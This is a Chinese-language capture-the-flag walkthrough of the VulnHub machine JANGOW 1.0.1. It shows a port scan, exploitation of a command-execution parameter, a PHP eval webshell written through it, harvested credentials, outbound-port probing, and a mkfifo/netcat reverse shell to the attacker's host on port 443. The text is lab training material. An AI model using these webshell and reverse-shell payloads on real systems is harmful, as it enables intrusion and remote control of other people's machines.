vulnhub靶场之JANGOW: 1.0.1

准备:
攻击机:虚拟机kali、本机win10 。
靶机:JANGOW: 1.0.1 , 地址我这里设置的桥接 , ,下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova.torrent,下载后直接VirtualBox打开,测试时发现vm打开之后靶机获取ip会出问题(设置的桥接 , 在网上看了vm修改ip的问题比较麻烦 , 所以就直接用的VirtualBox) 。

vulnhub靶场之JANGOW: 1.0.1

文章插图
信息收集:
扫描下靶机开放的端口和服务:nmap -T4 -sV -p- -A 172.20.10.2 , 显示开放了21、80端口 , 对应的服务是ftp服务和apache服务 。
vulnhub靶场之JANGOW: 1.0.1

文章插图
访问下ftp服务和tomcat服务,但是ftp服务缺少账号和密码无法登录,tomcat服务返回了一个界面
vulnhub靶场之JANGOW: 1.0.1

文章插图
vulnhub靶场之JANGOW: 1.0.1

文章插图
期间也对:http://172.20.10.2/和http://172.20.10.2/site/进行了目录扫描,但是并没有什么发现
vulnhub靶场之JANGOW: 1.0.1

文章插图

vulnhub靶场之JANGOW: 1.0.1

文章插图
然后就在主页面寻找功能点,右键查看源代码信息,在代码中发现busque.php文件和传递的参数buscar,猜测这里是命令执行漏洞或代码执行漏洞并进行测试,url:http://172.20.10.2/site/busque.php?buscar=id,可以查看pwd、ls等信息,确认这里存在命令执行漏洞 。
vulnhub靶场之JANGOW: 1.0.1

文章插图

vulnhub靶场之JANGOW: 1.0.1

文章插图

vulnhub靶场之JANGOW: 1.0.1

文章插图
web渗透:
通过命令执行写入一句话后门,url:http://172.20.10.2/site/busque.php?buscar=echo '<?php eval($_POST['upfine']);?>' > upfine.php,然后通过蚁剑进行连接 。
vulnhub靶场之JANGOW: 1.0.1

文章插图
在wordpress下发现config.php文件、html下发现.backup文件,/home/jangow01/下发现user.txt文件,root文件夹无权限查看(后面肯定要进行提权 , 那我们就得先获得shell权限) , 下载下来进行查看,发现两个账户名和密码,其中jangw01/abygurl69可以用于ftp登录 。
vulnhub靶场之JANGOW: 1.0.1

文章插图

vulnhub靶场之JANGOW: 1.0.1

文章插图
vulnhub靶场之JANGOW: 1.0.1

文章插图

vulnhub靶场之JANGOW: 1.0.1

文章插图
接下来进行反弹shell,但是发现nc参数不全 , 无法使用 。
vulnhub靶场之JANGOW: 1.0.1

文章插图
经过多种shell反弹测试 , 但是均未反弹成功,最后发现对端口进行了限制,经过测试发现443端口可以使用,端口测试过程如下:
在攻击机中安装iptables和libcbor0 , 在kali(攻击机)中使用iptables进行端口绑定,这里就限制了400:500的端口,语句:sudo iptables -A PREROUTING -t nat -p tcp --dport 400:500 -j REDIRECT --to-port 6688 。
vulnhub靶场之JANGOW: 1.0.1

文章插图
然后开启对6688端口的监听:nc -lvvp 6688,在然后在靶机中上传 一个简单的探测脚本 , 脚本信息:
for i in {400..450};dotimeout 1 nc -vz 172.20.10.5 $i && echo "$i open" >> result.txt || echo "$i closed" >> result.txt;done然后在蚁剑的命令窗口中执行脚本:bash test.sh,获得可以使用的端口信息 。
vulnhub靶场之JANGOW: 1.0.1

文章插图
然后就可以通过443端口来获取shell,设置的策略默认重启失效,还以为要自己删除,折腾了半天也没效果,最后才发现重启之后就会失效 。
通过蚁剑编写反弹shell,语句:<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.20.10.5 443 >/tmp/f');?>,kali端开启端口监听:nc -lvvp 443,然后访问shell.php文件(http://172.20.10.2/site/shell.php)获得shell权限 。
vulnhub靶场之JANGOW: 1.0.1

文章插图
【vulnhub靶场之JANGOW: 1.0.1】升级下shell,切换成交互式bash:python3 -c 'import pty;pty.spawn("/bin/bash")';

推荐阅读